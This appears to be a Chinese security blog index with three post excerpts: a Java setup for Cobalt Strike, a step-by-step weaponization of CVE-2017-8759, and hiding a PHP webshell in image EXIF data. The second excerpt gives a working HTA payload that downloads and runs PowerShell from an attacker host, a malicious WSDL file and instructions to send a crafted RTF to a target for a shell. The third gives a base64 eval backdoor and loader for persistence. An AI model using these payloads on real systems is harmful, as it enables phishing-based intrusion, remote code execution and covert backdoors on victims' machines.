0%

[TOC]
##需求
Cobalt strike 用openjdk的话,不稳定,而且运行时候提示openjdk不推荐。

##更新步骤

  1. 下载JDK1.7,这个版本是比较稳定的,对于cobalt strike来说。下载地址我找到过一次,后来在也找不到了,不知道为啥。JDK1.7百度网盘地址下载在后面。

  2. 将下载的jdk1.7解压缩。

  3. /usr/lib/jvm下新建jdk17,将解压出来的目录移动到该目录下。

  4. 运行以下三条命令,安装JDK1.7:

    1
    2
    3
    update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk17/bin/java 1
    update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk17/bin/javac 1
    update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk17/bin/jar 1
  5. 配置JDK1.7为默认java:

    1
    2
    3
    4
    5
    6
    7
    8
    update-alternatives --config java
    There are 2 choices for the alternative java (providing /usr/bin/java).

    Selection Path Priority Status
    ------------------------------------------------------------
    * 0 /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 1081 auto mode
    1 /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 1081 manual mode
    2 /usr/lib/jvm/jdk17/bin/java 1 manual mode

    选择2。完成。

##截图
jdk2.png

jdk.png

##JDK1.7下载
JDK7 百度网盘

Read more »

[TOC]

主要参考文章是来自Lz1y 大神的文章:http://www.lz1y.cn/wordpress/?p=799

更新记录:

最新修改与:2017年9月28日

##工具

  1. https://github.com/Lz1y/CVE-2017-8759.git
  2. Cobalt Strike(请自行下载)

##步骤

  1. 在kali上面,执行命令
    git clone https://github.com/Lz1y/CVE-2017-8759.git
  2. 进入cobalt strike目录,执行:
    ./teamserver 192.168.1.9 123456
  3. 在cobalt strike目录,执行./cobaltstrike运行cobalt strike客户端。
  4. 在cobalt strike中新建Listener,类型用http的,端口输入80
  5. 进入该目录,依次修改以下文档:
    5.1 gedit cmd.jpg (先cp cmd.hta cmd.jpg)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    <html>
    <head>
    <script language="VBScript">
    Sub window_onload
    window.resizeTo 0,0
    window.MoveTo -100,-100
    const impersonation = 3
    Const HIDDEN_WINDOW = 12
    Set Locator = CreateObject("WScript.Shell")
    Locator.Run"powershell.exe -nop -w hidden -c ""IEX (new-object net.webclient).downloadstring('http://192.168.1.9:80/a')""",0,FALSE
    window.close()
    end sub
    </script>
    <!--

    <script language="VBScript">
    Sub window_onload
    const impersonation = 3
    Const HIDDEN_WINDOW = 12
    Set Locator = CreateObject("WbemScripting.SWbemLocator")
    Set Service = Locator.ConnectServer()
    Service.Security_.ImpersonationLevel=impersonation
    Set objStartup = Service.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set Process = Service.Get("Win32_Process")
    Error = Process.Create("powershell.exe -nop -w hidden calc.exe", null, objConfig, intProcessID)
    window.close()
    end sub
    </script>
    -->
    </head>
    </html>
    微信截图_20170927155342.png
  6. 2 gedit exploit.txt
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    <definitions
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:suds="http://www.w3.org/2000/wsdl/suds"
    xmlns:tns="http://schemas.microsoft.com/clr/ns/System"
    xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">
    <portType name="PortType"/>
    <binding name="Binding" type="tns:PortType">
    <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
    <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
    </binding>
    <service name="Service">
    <port name="Port" binding="tns:Binding">
    <soap:address location="http://192.168.1.9?C:\Windows\System32\mshta.exe?http://192.168.1.9/cmd.jpg"/>
    <soap:address location=";
    if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {
    System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);
    System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);
    } //"/>
    </port>
    </service>
    </definitions>
    微信截图_20170927155425.png
    ​ 以上两个文档的修改要与cobalt strike相对应
  7. 设置攻击环境:
    6.1 Attacks -> Web Drive-by -> Scripted Web Delivery,启动一个powershell木马,设置如下图:
    微信截图_20170928122539.png
    点击”Launch”之后,会生成一个一句话的Powershell代码,记住其中的网址部分,填写到cmd.jpg中,替换掉url。
    6.2 Attacks -> Web Drive-by -> Host File,将cmd.jpg,一定要将Mime Type修改为application/hta,此处生成的URL请填入exploit.txt中相应的位置。
    6.3 Attacks -> Web Drive-by -> Host File,将exploit.txt,无需特殊设置,设置好Local URI,点击Launch,复制生成的URL。此URLCreateRTF.py脚本-u参数使用的。
    6.3 使用大神的CreatRTF.py生成一个rtf文档,url填写为Host exploit.txt时产生的url。

至此,步骤完成,将生成的rtf文档发送给目标,即可在cobalt strike teamserver上得到shell。

##注意事项

Read more »

[TOC]
##意义
常见WebShell比较容易识别,利用图片exif信息可以达到隐藏WebShell的目的,以便持久化。(当然,这不是持久化的最好方法,不过作为临时持久化方法还是可以试试的)

##工具

  1. ExifTool
  2. 一句话木马
  3. 中国菜刀客户端
  4. 图片

##步骤

  1. 跟度娘要一张喜欢的图片
    略了

  2. 安装ExifTool
    2.1 环境Kali
    2.2 命令:apt-get install exiftool

  3. 向图片中写入一句话木马
    执行命令:
    exiftool "-comment=<test.php timg.jpg"
    exiftool "-model=/.*/e" timg.jpg
    字符串:
    aWYgKGlzc2V0KCRfUE9TVFsiY21kIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjbWQiXSkpO30=
    Base64解码之后的东西,我就补贴出来了,总之密码是cmd
    执行结果如下:
    微信截图_20170918185956.png
    可以看到我们的一句话木马就写到了图片信息当中

  4. 修改版一句话木马

    1
    2
    3
    4
    <?php 
    $exif = exif_read_data('/www/web/phpshell_google_com/public_html/timg.jpg');
    preg_replace($exif[Model],$exif[Make],'');
    ?>
  5. GetShell
    微信截图_20170918191022.png

注意事项

[1] 图片路径可以是绝对路径,也可以是相对路径,如果是相对路径不要忘记./符号哦
[2] 测试PHP版本为5.5.根据大牛提示,preg_replace函数的/e选项在>5.6版本中废除,不过也有别的函数替代。思路是对的,注意函数使用。
[3] 不要长时间盯着苍老师的图片看,图有魔性~~
##参考
[1] https://www.trustwave.com/Resources/SpiderLabs-Blog/Hiding-Webshell-Backdoor-Code-in-Image-Files/
[2] https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

Read more »